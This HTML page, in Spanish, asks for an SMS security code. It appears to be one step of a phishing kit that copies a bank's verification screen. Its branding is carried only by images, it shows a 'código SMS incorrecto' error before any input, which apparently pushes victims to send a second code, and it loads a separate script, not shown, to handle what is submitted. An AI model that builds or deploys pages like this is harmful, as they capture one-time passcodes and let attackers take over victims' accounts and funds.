<!DOCTYPE html>
<html lang="">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/main.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div class="top">
        <img src="./img/hed.PNG" alt="">
    </div>

  

    <div class="kolch">
        <div>
            <img src="./img/inform.PNG" alt="">
        </div>
        <form method="post" id="pg5">
            <div>
                <p style="font-size: 13px; color: rgb(87, 87, 87);">Se le enviará un código de seguridad por SMS o por llamada desde un servidor de voz en su teléfono que será válido durante 5 minutos.</p>
                <p style="margin-top: 20px; font-size: 15px;">
                    Ingrese el código SMS
                </p>
               
            </div>
            <input type="text" name="" id="codima" required>
            <p style="color: rgb(196, 36, 36);">código SMS incorrecto</p>

            <div class="btn">
                <button type="submit">Siguiente</button>
            </div>
        </form>
    </div>
    <p style="color: white; text-align: center; font-size: 13px;">Características del servicio</p>
    <p style="color: white; text-align: center; font-size: 13px;">Modo de acceso</p>

    <div class="bot">
        <div class="img1">
            <img  src="./img/bot1.PNG" alt="">
        </div>

        <img src="./img/bot2.PNG" alt="">
    </div>
    <!-- my script -->
    <script src="./js/stb.js"></script>
</body>
</html>